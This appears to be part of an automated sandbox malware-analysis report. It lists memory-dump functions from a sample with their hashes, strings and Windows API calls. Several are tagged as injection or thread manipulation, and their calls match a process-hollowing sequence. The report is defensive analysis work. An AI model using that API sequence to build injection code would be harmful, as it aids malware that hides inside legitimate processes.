                                                control_flow_graph 2603 571557a-57155a1 call 572ece8 2606 57155a7-57155cf 2603->2606 2608 57155d5-57155e0 2606->2608 2609 571010d-5710118 2606->2609 2608->2609 2610 5710121-5723d86 2609->2610 2611 571011a-5710570 2609->2611 2615 5710576-571059e 2611->2615 2616 571b1ca-571b1d1 2611->2616 2615->2609 2621 57105a4-57105af 2615->2621 2617 571d6c0-571d6f9 2616->2617 2618 571b1d7-571b1e2 2616->2618 2623 571837c-5718383 2617->2623 2624 571d6ff-571d727 2617->2624 2618->2609 2621->2609 2625 5718385-5718391 2623->2625 2626 57183ad 2623->2626 2624->2609 2632 571d72d-571d736 2624->2632 2627 5718393-5718399 2625->2627 2628 571839b-57183a1 2625->2628 2629 57183b3-571841f 2626->2629 2631 57183ab 2627->2631 2628->2631 2629->2609 2636 5718425-5718430 2629->2636 2631->2629 2632->2609 2636->2609 2636->2616
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,$=
                                                • API String ID: 0-1737935649
                                                • Opcode ID: 2ba7b5ff3ad42becde23d328e046c874e15a5b0fb0a2c69a52c53950b7ae55cf
                                                • Instruction ID: a9601ec36630f0ab3cbfd1aa1c50b5a646b29d617d1a76df21c7ed9cf10d0a26
                                                • Opcode Fuzzy Hash: 2ba7b5ff3ad42becde23d328e046c874e15a5b0fb0a2c69a52c53950b7ae55cf
                                                • Instruction Fuzzy Hash: 3CF0443494011ACFD760DB68D888BED76B1FF04315F6180E6D40DA3292C7384EC8AF02
                                                Function 04EFA640 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq
                                                • API String ID: 0-3092978723
                                                • Opcode ID: 84687541f1cd35dd200a22f1a5ef94135a629344e672f8e8ef69448b714f0f90
                                                • Instruction ID: b667d0464665567d4830c610872ff811b5b980b826cb0bc6dae4845436346316
                                                • Opcode Fuzzy Hash: 84687541f1cd35dd200a22f1a5ef94135a629344e672f8e8ef69448b714f0f90
                                                • Instruction Fuzzy Hash: A3521C75A002289FDB24DF68C941BDDBBF6BF88300F1581E9E549AB351DA30AD81CF61
                                                Function 04EF4B80 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (_]q
                                                • API String ID: 0-188044275
                                                • Opcode ID: 0646c1f8c7835d4e09f5014f48de7c2f2fd3b4133e2dd7e74f50005f05656642
                                                • Instruction ID: 13548ff9aac18a9e990dc412d32218a223d1fed59a8260cec6934b50094515be
                                                • Opcode Fuzzy Hash: 0646c1f8c7835d4e09f5014f48de7c2f2fd3b4133e2dd7e74f50005f05656642
                                                • Instruction Fuzzy Hash: 36228F35B002049FDB04DFA8D990AAEB7F2FF88314F148569EA059B3A6DB75ED41CB50
                                                Function 05505920 Relevance: 1.8, APIs: 1, Instructions: 277processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05505BCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f5c471548f83f81b76313e3d1fd9328653713948a2f4c3d637a782b1d5f960f0
                                                • Instruction ID: 8eeb6aea8f35809db535579c6a302768527d9fd8aac02b8a39d2110b3eb01b13
                                                • Opcode Fuzzy Hash: f5c471548f83f81b76313e3d1fd9328653713948a2f4c3d637a782b1d5f960f0
                                                • Instruction Fuzzy Hash: CAA10470D042188FDF20DFA9C8857EDBBF1BF09314F14A16AE859A7280EB749985CF85
                                                Function 0550595E Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05505BCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c83fbe75fad3a4268b935bbf480a096811512e1d5ae5c61c072bbd0003099b3d
                                                • Instruction ID: 1dcdc40d388edb78b7fa6aeb8a57e5457f5c7187f7533e8116c91d7177388af4
                                                • Opcode Fuzzy Hash: c83fbe75fad3a4268b935bbf480a096811512e1d5ae5c61c072bbd0003099b3d
                                                • Instruction Fuzzy Hash: 15A1F3B0D002299FDF20CFA9C8857EDBBF1BF09314F14A169E859A7280EB749985CF45
                                                Function 05505968 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05505BCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f4a4071ae21d0bf71c134131e045464e49a30f97b7132148da4f680f6fb67d49
                                                • Instruction ID: 71162f31900163275a483750375e64b511eaacb4fa49be08056e4563c680641f
                                                • Opcode Fuzzy Hash: f4a4071ae21d0bf71c134131e045464e49a30f97b7132148da4f680f6fb67d49
                                                • Instruction Fuzzy Hash: 92A1F370D002199FDF20CFA9C885BEDBBF1BF09310F14A169E859A7280EB749985CF85
                                                Function 04EFB4A7 Relevance: 1.7, Strings: 1, Instructions: 477COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q
                                                • API String ID: 0-1007455737
                                                • Opcode ID: a582957ca7ed6cafbfc51eb269f749b07263d48db0f09bc5a161b1372614701b
                                                • Instruction ID: af3331123bc5810c3442935174787bee14a7b3c707245eabf29bd383883fb2b9
                                                • Opcode Fuzzy Hash: a582957ca7ed6cafbfc51eb269f749b07263d48db0f09bc5a161b1372614701b
                                                • Instruction Fuzzy Hash: 0102D0717042429FE714AF28D8517AE7BE2EFC5304F248429E685CB392EA34FD42DB52
                                                Function 05506A50 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05506B28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 504ba3655b00991582edab95d2fc2803eac81f152eb8b51197bd8ba059efece3
                                                • Instruction ID: f5bb43acf84efbfb8ecddb139c640cf2f367ece9a06e3e547fd4d5daa82c6413
                                                • Opcode Fuzzy Hash: 504ba3655b00991582edab95d2fc2803eac81f152eb8b51197bd8ba059efece3
                                                • Instruction Fuzzy Hash: A541DDB5D012589FCF00DFA9D984AEEFBF1FB09310F20902AE419B7240D738AA45CB94
                                                Function 05506A58 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05506B28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: e9e50c2a25c3979a312e0c70f970581513a67141f0ab6fb419ba28a2879563ad
                                                • Instruction ID: 665288b154e6319a3ca99118c53eee2f91f385dcb5fa8bd94078d96b7ff45786
                                                • Opcode Fuzzy Hash: e9e50c2a25c3979a312e0c70f970581513a67141f0ab6fb419ba28a2879563ad
                                                • Instruction Fuzzy Hash: D441ACB4D012589FCF00DFA9D984AEEFBF1BB49310F10902AE819B7250D739A945CB54
                                                Function 05506A12 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05506B28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 085dfc697636e841c0c6be56e088a457c069da3110d8bf6033bb3de5ea7559d9
                                                • Instruction ID: d0be27779c892206a87ec87f16a87578a146f6652006aff2aca6df856805c2bf
                                                • Opcode Fuzzy Hash: 085dfc697636e841c0c6be56e088a457c069da3110d8bf6033bb3de5ea7559d9
                                                • Instruction Fuzzy Hash: 9941BDB5D012188FCF04DFA9D944AEEBBF1BF49304F14A42AE415B7250C7389951CB64
                                                Function 05505CD0 Relevance: 1.6, APIs: 1, Instructions: 108threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 05505DC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: d15cbdf515a6499bb8fe3fd4d2737ea42c4ec800946bd9abab5ac05bf710cd97
                                                • Instruction ID: 032e583e6a374e6820b916f8fce8fd81885e417bc35661bc05a92f32864e10cb
                                                • Opcode Fuzzy Hash: d15cbdf515a6499bb8fe3fd4d2737ea42c4ec800946bd9abab5ac05bf710cd97
                                                • Instruction Fuzzy Hash: D241F0B5D01208CFCB10DFA9D544BEDBBB1BF49314F24902AE409BB250D7799A85CF94
                                                Function 05506790 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05506842
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 2d886b61413b18e10d4eb7f16e8c59f53853711bea8ee01f6061f31e7b4de165
                                                • Instruction ID: 2a9e57ae88d6d93033a6f7bcdd439e755aa995a78bedd047add0fe8c6703bd62
                                                • Opcode Fuzzy Hash: 2d886b61413b18e10d4eb7f16e8c59f53853711bea8ee01f6061f31e7b4de165
                                                • Instruction Fuzzy Hash: EA3197B8D002589BCF10CFA9D980A9EBBB1FF49310F10A42AE815B7210D735A945CFA4
                                                Function 05506798 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05506842
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 946a8279c702d4c3a722d06327af328bf05badf460392e39d5b17bfdf36deb14
                                                • Instruction ID: 3042ab587fdd53185e49f1f817b710bad7a0c3c799aafd9e86bd1adc4b0785a8
                                                • Opcode Fuzzy Hash: 946a8279c702d4c3a722d06327af328bf05badf460392e39d5b17bfdf36deb14
                                                • Instruction Fuzzy Hash: CA3187B8D002589FCF10CFA9D980A9EFBB5BF49310F10A42AE819B7250D735A945CFA4
                                                Function 05505D10 Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 05505DC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: e3739eecf739e9eb11b1b5c40deb986253378ab83f22e77687b91c291d0cc0a8
                                                • Instruction ID: 5f46b3fcae43cb5c4ffc6b8494dbe3f705e43702e3b6c5f509e7cf35d61a362f
                                                • Opcode Fuzzy Hash: e3739eecf739e9eb11b1b5c40deb986253378ab83f22e77687b91c291d0cc0a8
                                                • Instruction Fuzzy Hash: AF41BDB5D012589FCB10DFAAD984AEEFFF1BB49310F14902AE419B7240D739AA45CF94
                                                Function 0548DB70 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0548DC14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125779245.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5480000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 87373b80205f8ca236bff80791355ffde0fe2827456c8bfbc9179f14767ef12e
                                                • Instruction ID: 26770db17fa3048bc96212537fea81cbd5605ed47ec4552a5df305220a035d07
                                                • Opcode Fuzzy Hash: 87373b80205f8ca236bff80791355ffde0fe2827456c8bfbc9179f14767ef12e
                                                • Instruction Fuzzy Hash: 383198B8D012589FCF10DFA9D984AEEFBB1BF49310F10942AE819B7210D775A945CF94
                                                Function 05505D18 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 05505DC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: b18d84da980b7a14a0136a3b402f52071ec78e0d3a82713f31dcdbb96bfeef24
                                                • Instruction ID: 29fd87bcffb3c5c12b37f9063bb5a295a3bfe7fbdcd076e4208865739c65e2cc
                                                • Opcode Fuzzy Hash: b18d84da980b7a14a0136a3b402f52071ec78e0d3a82713f31dcdbb96bfeef24
                                                • Instruction Fuzzy Hash: D331BCB5D002589FCB10DFAAD984AEEFBF1BF49310F14902AE419B7240D778A945CF94
                                                Function 05506DE8 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 05506E6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: d9faa689cd5fd72af75324ca03f7b9fdb9866485aaa848e6a797323646528d50
                                                • Instruction ID: fbd32c0fe72e0a5198a3f44728d47c275cf4d3e959eb81666ff47ab509cef0ee
                                                • Opcode Fuzzy Hash: d9faa689cd5fd72af75324ca03f7b9fdb9866485aaa848e6a797323646528d50
                                                • Instruction Fuzzy Hash: 4531CBB4D012189FCF14CFAAD985AAEFBB5BF49310F10942AE819B7340C735A841CFA4
                                                Function 05506DF0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 05506E6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7c90352eb8ae7011a5be5a7f410825c1a56f2ab55658b56147b65b0feef855bd
                                                • Instruction ID: 2e9c26a63e1f627741150551642efca8d1009b377042340c1dfaec07bc07fe4f
                                                • Opcode Fuzzy Hash: 7c90352eb8ae7011a5be5a7f410825c1a56f2ab55658b56147b65b0feef855bd
                                                • Instruction Fuzzy Hash: 4831ACB4D012189FCF14CFAAD584AAEFBB5BF49310F10942AE419B7350C735A945CFA4
                                                Function 04EFE2D0 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                • Opcode ID: 951cbdcf77f8188d10314b9149dfbcd561f62198b2e6ea352082be4aaeadcb54
                                                • Instruction ID: 57d7c2ab96332eca42e0b4517e9f6a80c483d77d2eed35946cca3184189b6349
                                                • Opcode Fuzzy Hash: 951cbdcf77f8188d10314b9149dfbcd561f62198b2e6ea352082be4aaeadcb54
                                                • Instruction Fuzzy Hash: BFA1A1317042009FD7159F68D854A6A7BB3FF89304B1584A9E60A8F7B2DB36FC42DB91
                                                Function 04EF9759 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: c08243c5f72b1760a6ab514263d99661dc9a096879f4d0b35f6bdd0d34096efc
                                                • Instruction ID: 1da43a5219114f588e24cd083f29a6f47e14cebdeea45930dfb86537719c0d3f
                                                • Opcode Fuzzy Hash: c08243c5f72b1760a6ab514263d99661dc9a096879f4d0b35f6bdd0d34096efc
                                                • Instruction Fuzzy Hash: 2FA1FA74A10618DFDB08EFA4D894A9DBBB2FF88304F519159E945AB3A5DB30FC42CB50
                                                Function 05472918 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                • Opcode ID: 2e67a8f1120ccdc98291edd67b41d9a14ee6738dd653527c977fad9356fefa55
                                                • Instruction ID: e2b84acc7cc809180f0b5bcaf2f759a8ac1a491fdc472b4108b083c3a8eefaa6
                                                • Opcode Fuzzy Hash: 2e67a8f1120ccdc98291edd67b41d9a14ee6738dd653527c977fad9356fefa55
                                                • Instruction Fuzzy Hash: B1719B75B046098FCB14DFA9C684AEFBBF2FFC8310F14856AD459A7345DB70AA028B50
                                                Function 04EFD3F8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: bf7fc89a112127d8b180edecf845b1e8fc53a9ecea4bc2b555e5c14e91540c16
                                                • Instruction ID: 25fbe340d35dfd9a9e2e906e5e58f919ff885df4dbe04ed115bedfb454a16c81
                                                • Opcode Fuzzy Hash: bf7fc89a112127d8b180edecf845b1e8fc53a9ecea4bc2b555e5c14e91540c16
                                                • Instruction Fuzzy Hash: 9F419270B102188FDB08AB64DC54AAEBBB7EFC9704F505119D546AB3A4DF74BC06CB91
                                                Function 00F1D422 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJbq
                                                • API String ID: 0-1760495472
                                                • Opcode ID: 4b7f620821bd49ff2f5d29c71d51e73ee1f5194ba910ed4f4d50c2c5e8ca7172
                                                • Instruction ID: 32c31687cd56c620b4f30e84873ceb3ec721ceb6b0d5f069aa1896660255601a
                                                • Opcode Fuzzy Hash: 4b7f620821bd49ff2f5d29c71d51e73ee1f5194ba910ed4f4d50c2c5e8ca7172
                                                • Instruction Fuzzy Hash: 3D51BF74E05208DFDB04DFA9D984AEDBBF2BF88310F10816AE406A7261DB34A985DF50
                                                Function 00F1D430 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJbq
                                                • API String ID: 0-1760495472
                                                • Opcode ID: 91bd4f570d7a640780c408b4fae479e684ce639b056cdb71e9ef93872b7c2141
                                                • Instruction ID: 57c4d10fdbe1c5b01a5ee23fb9430a5ce5ca02f4499b74dbcd1eb78f895ccefc
                                                • Opcode Fuzzy Hash: 91bd4f570d7a640780c408b4fae479e684ce639b056cdb71e9ef93872b7c2141
                                                • Instruction Fuzzy Hash: 0C51AF74E01208DFDB04DFA9D984AEDBBF2BF88310F10806AE406A7265DB74A985DF50
                                                Function 04EFCE02 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: a573ab9e10c8fe18135fef2fc6ea0e565620a17c85f235803c16c096ed909b7d
                                                • Instruction ID: 63dd767b2251521f9752c36380602b91ebad2bfe84ac84d71b27d814cf6db476
                                                • Opcode Fuzzy Hash: a573ab9e10c8fe18135fef2fc6ea0e565620a17c85f235803c16c096ed909b7d
                                                • Instruction Fuzzy Hash: F44180713406049FE308DB28D955B2A7BEAFFC8704F204558E64A8F3A5CE75EC02C791
                                                Function 04EF1140 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq
                                                • API String ID: 0-3092978723
                                                • Opcode ID: 770cb2087c85d1a539dd2ecefbe706a2fa1797f7bea15a426566983ec53066bf
                                                • Instruction ID: 78ab8cd8a8a55034b5ebc8f308789fc61a6d9494f096d203a37949c4390475fc
                                                • Opcode Fuzzy Hash: 770cb2087c85d1a539dd2ecefbe706a2fa1797f7bea15a426566983ec53066bf
                                                • Instruction Fuzzy Hash: A141BE35700109CFCB05EFA9D8509AEBBB6EF89310B11816AE905DF361DB31ED02CB91
                                                Function 04EFCE10 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: 147b86c6c5fb95e9eda1c9d9b1f83b546116a49adc42bd8d5a44c395e7fc1e21
                                                • Instruction ID: 10aff05bda46115bbef874c6a85cc9678c5e1e62261233589f1e748b63f8c1cc
                                                • Opcode Fuzzy Hash: 147b86c6c5fb95e9eda1c9d9b1f83b546116a49adc42bd8d5a44c395e7fc1e21
                                                • Instruction Fuzzy Hash: A7315C713406049FD308EB69D994F2A77EAFFC8B14F204568E60A8B3A5CE75EC42C791
                                                Function 05471BF7 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                • Opcode ID: c8fea7e2e6bdbc2c165aaef1b89b40f7bd4375096121beda9fa32f3b706a7372
                                                • Instruction ID: b8fc4e9ff1877caaa4d2ba7408ba379d785b866c2bd98e9e3e700eb71b928e67
                                                • Opcode Fuzzy Hash: c8fea7e2e6bdbc2c165aaef1b89b40f7bd4375096121beda9fa32f3b706a7372
                                                • Instruction Fuzzy Hash: 5231DE35B046158FC7289F6998815AFBBF2FBC8221714892ED95AD3781CB30EC03CB81
                                                Function 0572F8A0 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                • Opcode ID: 2d8c87980562b87b2cb3b6de457772ef20c314eb4757ce198be30ff1ddd81594
                                                • Instruction ID: 14ddfab9cb206593fdc1acd2d816c922a2235bfccfe9cdc6724530fcd5c8b2f0
                                                • Opcode Fuzzy Hash: 2d8c87980562b87b2cb3b6de457772ef20c314eb4757ce198be30ff1ddd81594
                                                • Instruction Fuzzy Hash: 9621F0363042516FEB046E6DD8409AEBF67EFC9320B14807AE909CB365CE729C12C790
